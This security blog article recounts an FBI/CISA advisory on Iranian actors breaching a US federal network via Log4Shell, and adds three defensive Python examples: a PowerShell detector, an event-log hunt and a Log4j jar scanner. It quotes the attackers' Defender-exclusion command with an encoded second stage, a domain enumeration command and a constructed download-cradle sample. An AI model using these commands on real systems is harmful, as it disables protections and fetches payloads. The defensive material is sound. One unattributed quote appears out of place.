Iranian APT Uses Log4j Vulnerability
To Hack US Federal Network

Summary Of The Attack

  • This is not the first time US federal agencies have been hit: in an earlier wave of attacks in December of the previous year, federal agencies and private companies were compromised, among them the Department of the Treasury, the Department of Commerce, and the US Department of Homeland Security.
  • In this incident, the FBI and CISA report that Iranian government-sponsored actors accessed an undisclosed US federal agency’s network early this year, exploiting the Log4Shell vulnerability to deploy a crypto miner and compromise credentials.
  • “Cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, advanced to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” according to the advisory.
  • The attack highlights how widespread Log4j exposure remains: the vulnerability made worldwide headlines a year ago and is still a live risk for many organizations.

What Happened?

According to the FBI and CISA, Iranian government-sponsored hackers accessed an undisclosed US federal agency’s network early this year, exploiting the Log4Shell vulnerability to deploy a crypto miner and compromise credentials.

The joint advisory gives more detail: the actors broke into an unpatched VMware Horizon server in February 2022, and US security officials carried out an incident response in June to remediate the network.

How The Attack Happened

“Cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, advanced to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” according to the advisory.

The Attack Path

The attack path used to breach US federal networks.

After identifying the vulnerable VMware Horizon server, the threat actors connected to it from the following malicious IP address: 182.54.217[.]2

The exploit payload added a Windows Defender exclusion before fetching the next stage, using the following PowerShell command:

powershell try{Add-MpPreference -ExclusionPath 'C:\'; Write-Host 'added-exclusion'} catch {Write-Host 'adding-exclusion-failed'}; powershell -enc "$BASE64 encoded payload to download next stage and execute it"

That rule excludes the entire C:\ drive from Windows Defender scanning, so any tooling the actors subsequently dropped anywhere on the drive went undetected by the antivirus.
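The two halves of that command, a drive-wide Defender exclusion followed by an encoded second stage, are exactly what PowerShell Script Block Logging (Event ID 4104) captures. The Python below is an added example, not code from the advisory or from the page's author: it decodes any -enc/-EncodedCommand blob (base64 over UTF-16LE), extracts Add-MpPreference exclusion paths, flags exclusions that cover a whole drive or a system-wide top-level folder, and scores a block high when a broad exclusion and a download cradle appear together. The sample script blocks are constructed for this example; 203.0.113.5 is a documentation address standing in for the real download host.

```python
"""Added example: triage PowerShell 4104 script-block text for the
"blind Defender, then fetch the next stage" pattern described above."""
import base64
import re
from typing import Optional

# Defender exclusion paths; handles 'single', "double" and bare arguments.
EXCLUSION_RE = re.compile(r"-ExclusionPath\s+(?:'([^']*)'|\"([^\"]*)\"|([^\s;]+))", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Common PowerShell download cradles.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
# Top-level folders that are too broad to be a legitimate exclusion.
BROAD_TOP_LEVEL = {"windows", "users", "programdata", "temp", "program files"}


def decode_encoded_command(blob: str) -> Optional[str]:
    """PowerShell -EncodedCommand is base64 over UTF-16LE text; None if it is not."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def is_broad_exclusion(path: str) -> bool:
    """True for a whole drive (C:\\, D:) or a system-wide top-level folder."""
    parts = [p for p in path.strip().rstrip("\\").split("\\") if p]
    if len(parts) == 1 and re.fullmatch(r"[A-Za-z]:", parts[0]):
        return True
    return len(parts) == 2 and parts[1].lower() in BROAD_TOP_LEVEL


def analyze_script_block(text: str) -> dict:
    exclusions = [next(g for g in m.groups() if g is not None)
                  for m in EXCLUSION_RE.finditer(text)]
    decoded = []
    for m in ENC_RE.finditer(text):
        plain = decode_encoded_command(m.group(1))
        if plain is not None:
            decoded.append(plain)
    broad = any(is_broad_exclusion(p) for p in exclusions)
    cradle = any(CRADLE_RE.search(d) for d in decoded)
    if broad and cradle:
        severity = "high"      # the advisory's shape: disable scanning, then download
    elif exclusions or cradle:
        severity = "medium"    # either half alone still deserves a look
    else:
        severity = "none"
    return {"exclusions": exclusions, "broad_exclusion": broad,
            "encoded_commands": decoded, "download_cradle": cradle,
            "severity": severity}


def analyze_script_blocks(blocks):
    return [analyze_script_block(b) for b in blocks]


# Constructed second stage; 203.0.113.5 is a documentation address, not a real host.
SECOND_STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/file.zip')"
ENC = base64.b64encode(SECOND_STAGE.encode("utf-16-le")).decode("ascii")

# Constructed 4104 script-block samples (not real telemetry).
SAMPLE_SCRIPT_BLOCKS = [
    # benign administration
    "Get-ChildItem C:\\Users | Measure-Object",
    # the pattern from the advisory: whole-drive exclusion, then an encoded cradle
    "try{Add-MpPreference -ExclusionPath 'C:\\'; Write-Host 'added-exclusion'} "
    "catch {Write-Host 'adding-exclusion-failed'}; powershell -enc " + ENC,
    # a narrow exclusion: worth reviewing, but not the same signal
    "Add-MpPreference -ExclusionPath 'C:\\Program Files\\Corp\\Backup'",
]

if __name__ == "__main__":
    for block, result in zip(SAMPLE_SCRIPT_BLOCKS, analyze_script_blocks(SAMPLE_SCRIPT_BLOCKS)):
        print(result["severity"].upper().ljust(6), "|", block[:70])
```

On a real host the same two signals are also available without script-block logging: Defender writes Event ID 5007 to the Microsoft-Windows-Windows Defender/Operational log whenever an exclusion is changed, and Get-MpPreference exposes the current ExclusionPath list, so a whole-drive entry can be hunted for directly.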

The decoded payload then downloaded file.zip from 182.54.217[.]2 and removed mde.ps1 from disk.

Researchers who unpacked file.zip found the XMRig crypto-mining software inside. The actors also downloaded roughly 30 megabytes of additional tooling from the file-sharing site transfer[.]sh.

The downloaded tools were:

  • PsExec: a Microsoft-signed remote execution tool used by system administrators.
  • Mimikatz: a credential theft tool.
  • Ngrok: a reverse proxy tool that exposes an internal service on a public Ngrok domain.

After running Mimikatz on the VDI-KMS host, the actors used the harvested credentials to create a rogue domain administrator account.

The actors then used RDP with the newly created account to log in to a number of machines on the network.

On the domain controller, the threat actors ran the following PowerShell command to enumerate every computer in Active Directory, listing each host’s name, operating system and IPv4 address and redirecting the output to a file:

Powershell.exe get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address >

Although the rogue domain admin account was the primary route to the domain controller, the actors also changed the local administrator password on hosts as a fallback in case that account was identified and revoked.
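The post-Mimikatz steps above (a new account promoted to Domain Admins, RDP logons with it across hosts, and a local Administrator password reset as a fallback) each leave a Windows Security event: 4720 (account created), 4728/4756 (member added to a security-enabled global/universal group), 4624 with logon type 10 (RemoteInteractive, i.e. RDP) and 4724 (password reset attempt). The Python below is an added example, not from the advisory, that correlates those events into one finding per suspicious account. The events use a simplified, constructed schema rather than raw EVTX, and every account, host and address name is invented.

```python
"""Added example: correlate Security events into a "rogue domain admin" finding."""
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"domain admins", "enterprise admins"}
RDP_LOGON_TYPE = 10          # RemoteInteractive
BUILTIN_ADMIN_RID = "-500"   # the built-in local Administrator account

# Constructed sample events (simplified schema).  Field meaning:
#   actor  -> account doing the action (SubjectUserName); for 4624 it is the
#             account that logged on (TargetUserName)
#   target -> account acted upon (TargetUserName for 4720/4724, MemberName for 4728)
SAMPLE_EVENTS = [
    {"id": 4720, "time": "2022-02-10T10:01:00", "host": "DC01", "actor": "helpdesk.admin", "target": "svc_update"},
    {"id": 4728, "time": "2022-02-10T10:02:30", "host": "DC01", "actor": "helpdesk.admin", "target": "svc_update", "group": "Domain Admins"},
    {"id": 4624, "time": "2022-02-10T10:20:00", "host": "WS01", "actor": "svc_update", "logon_type": 10, "src_ip": "10.0.0.5"},
    {"id": 4624, "time": "2022-02-10T10:25:00", "host": "FS01", "actor": "svc_update", "logon_type": 10, "src_ip": "10.0.0.5"},
    {"id": 4624, "time": "2022-02-10T10:26:00", "host": "DC01", "actor": "svc_update", "logon_type": 3, "src_ip": "10.0.0.5"},
    {"id": 4724, "time": "2022-02-10T10:31:00", "host": "WS01", "actor": "svc_update", "target": "Administrator", "target_sid": "S-1-5-21-1111-2222-3333-500"},
    # benign: a new account that is never made a domain admin
    {"id": 4720, "time": "2022-02-10T11:00:00", "host": "DC01", "actor": "hr.admin", "target": "new.hire"},
    {"id": 4728, "time": "2022-02-10T11:01:00", "host": "DC01", "actor": "hr.admin", "target": "new.hire", "group": "Sales"},
]


def _when(ev):
    return datetime.fromisoformat(ev["time"])


def hunt_rogue_domain_admins(events, window=timedelta(hours=1)):
    """One finding per account created (4720) and added to a privileged group
    (4728/4756) within `window`, enriched with the hosts it reached over RDP and
    the hosts where it reset the built-in Administrator password."""
    events = sorted(events, key=_when)
    created = {}    # account -> its 4720 event
    findings = {}   # account -> finding
    for ev in events:
        if ev["id"] == 4720:
            created[ev["target"].lower()] = ev
        elif ev["id"] in (4728, 4756) and ev.get("group", "").lower() in PRIVILEGED_GROUPS:
            acct = ev["target"].lower()
            born = created.get(acct)
            if born is not None and _when(ev) - _when(born) <= window:
                findings[acct] = {
                    "account": ev["target"],
                    "created_by": born["actor"],
                    "created_on": born["host"],
                    "promoted_to": ev["group"],
                    "rdp_hosts": [],
                    "local_admin_resets": [],
                }
    # Second pass: what did each rogue account then do?
    for ev in events:
        finding = findings.get(ev.get("actor", "").lower())
        if finding is None:
            continue
        if ev["id"] == 4624 and ev.get("logon_type") == RDP_LOGON_TYPE:
            if ev["host"] not in finding["rdp_hosts"]:
                finding["rdp_hosts"].append(ev["host"])
        elif ev["id"] == 4724 and ev.get("target_sid", "").endswith(BUILTIN_ADMIN_RID):
            finding["local_admin_resets"].append(ev["host"])
    return list(findings.values())


if __name__ == "__main__":
    for f in hunt_rogue_domain_admins(SAMPLE_EVENTS):
        print(f)
```

The one-hour window is a tuning choice: a legitimate onboarding rarely creates an account and grants it Domain Admins within minutes, whereas an actor working from a freshly harvested credential does exactly that. Matching the target SID on the RID suffix -500 rather than on the name catches the built-in Administrator even where it has been renamed.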


Log4j Vulnerability Still Persists

The attack highlights how widespread Log4j exposure remains. The vulnerability made worldwide headlines a year ago and is still a live danger for many organizations; late last year CISA warned that the issue could affect hundreds of millions of devices.

“Log4j is particularly difficult to identify and patch as it may be bundled as a deep dependency in software bought and operated by companies without the resources to find and patch such a vulnerability,” Jamie Boote, software security consultant at Synopsys Software Integrity Group, told SC Media.

As part of an Emergency Directive (ED 22-02) issued by CISA to federal civilian agencies last year, agencies were required to inventory their software assets against a CISA-managed GitHub repository of software believed to be affected and to prioritize patching.

Log4Shell was also added to the agency’s Known Exploited Vulnerabilities (KEV) catalog, a continuously updated list of vulnerabilities that federal civilian agencies must identify and remediate by a set deadline, in this case within two weeks.
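The inventory step is harder than it sounds because log4j-core is usually bundled inside other archives rather than installed on its own. The Python scanner below is an added example, not part of the advisory, the directive or CISA's repository: it walks a directory tree, opens every .jar/.war/.ear, descends into archives nested inside archives, and reports each log4j-core copy's version (from its Maven pom.properties, falling back to the file name) and whether JndiLookup.class is still present. The sample tree it scans is built in a temporary directory from constructed archives whose class-file bytes are placeholders; the version threshold it applies covers CVE-2021-44228 only.

```python
"""Added example: find bundled log4j-core, including jars nested inside
wars/ears, and flag copies still exposed to Log4Shell (CVE-2021-44228)."""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FIRST_FIXED = (2, 15, 0)  # fixes CVE-2021-44228 only; follow-on CVEs moved the floor to 2.17.1


def _version_from_name(name):
    m = re.search(r"log4j-core-(\d+\.\d+(?:\.\d+)?)\.jar$", name)
    return m.group(1) if m else None


def is_vulnerable(version, jndi_present):
    """Without JndiLookup.class the lookup cannot fire at any version.  With it,
    an unknown or unparseable version (e.g. 2.0-beta9) is treated as vulnerable."""
    if not jndi_present:
        return False
    if version is None:
        return True
    try:
        return tuple(int(x) for x in version.split(".")) < FIRST_FIXED
    except ValueError:
        return True


def inspect_archive(data, label, findings):
    """Inspect one archive held in memory and recurse into archives it contains."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version is None:
            version = _version_from_name(label)
        if JNDI_CLASS in names or version is not None:
            findings.append({"path": label, "version": version,
                             "jndi_lookup_present": JNDI_CLASS in names,
                             "vulnerable": is_vulnerable(version, JNDI_CLASS in names)})
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                inspect_archive(zf.read(name), label + "!" + name, findings)


def scan_tree(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), path, findings)
    return findings


def _make_jar(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed fixtures; the class bytes are placeholders, not real classes."""
    jndi = {JNDI_CLASS: b"\xca\xfe\xba\xbe"}
    vuln_core = _make_jar({**jndi, POM_PROPS: b"version=2.14.1\n"})
    fixed_core = _make_jar({**jndi, POM_PROPS: b"version=2.17.1\n"})
    stripped_core = _make_jar({POM_PROPS: b"version=2.14.1\n"})  # JndiLookup.class removed
    files = {
        "webapps/app.war": _make_jar({"WEB-INF/web.xml": b"<web-app/>",
                                      "WEB-INF/lib/log4j-core-2.14.1.jar": vuln_core}),
        "lib/log4j-core-2.17.1.jar": fixed_core,
        "lib/log4j-core-2.14.1-patched.jar": stripped_core,
        "lib/commons-io.jar": _make_jar({"org/apache/commons/io/IOUtils.class": b"\xca\xfe"}),
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo():
    """Build the sample tree in a temp dir, scan it, and return findings with
    root-relative forward-slash paths, sorted for stable output."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        findings = scan_tree(root)
    for f in findings:
        f["path"] = os.path.relpath(f["path"], root).replace(os.sep, "/")
    return sorted(findings, key=lambda f: f["path"])


if __name__ == "__main__":
    for f in demo():
        print("VULNERABLE" if f["vulnerable"] else "ok        ", f["version"], f["path"])
```

Two limits worth knowing before trusting a clean result: the scanner only recognizes log4j-core under its standard package path, so a copy shaded into a vendor's own package namespace is missed, and it checks the Log4Shell threshold alone, while the later CVEs in the same family made 2.17.1 the practical minimum.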

“We have alerted people affected and are revealing more here because we take our commitment to security, privacy, and openness seriously,” the statement reads, adding: “We also investigated our logs, and found no indication of successful misuse.”

Wrapping Up

The bottom line is that we still have plenty of devices across the internet vulnerable to Log4j.

We are also aware that there are organizations that still do not understand the seriousness of such problems and vulnerabilities.

Organizations must continually focus on identifying and mitigating vulnerabilities inside their business in order to have the best possible protection.

Article by

Jason Firch, MBA
Jason is a proven marketing leader, veteran IT operations manager, and cybersecurity expert with over a decade of experience. He is the founder and CEO of PurpleSec.
